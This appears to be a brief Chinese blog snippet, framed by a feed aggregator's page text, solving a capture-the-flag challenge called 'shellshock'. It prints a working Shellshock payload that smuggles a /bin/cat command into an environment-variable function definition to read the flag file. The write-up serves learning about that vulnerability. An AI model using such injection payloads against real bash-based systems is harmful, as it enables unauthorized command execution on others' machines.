Quantcast
Channel: 记事本
Viewing all articles
Browse latest Browse all 122

shellshock

$
0
0

好吧,从这名字就知道是怎么回事儿了,前端时间爆出来的shellshock漏洞。我们需要执行cat flag就行。不过我开始试cat会说找不到文件,于是用/bin/cat

$ env x='() { :;}; /bin/cat flag' ./shellshock

Viewing all articles
Browse latest Browse all 122

Trending Articles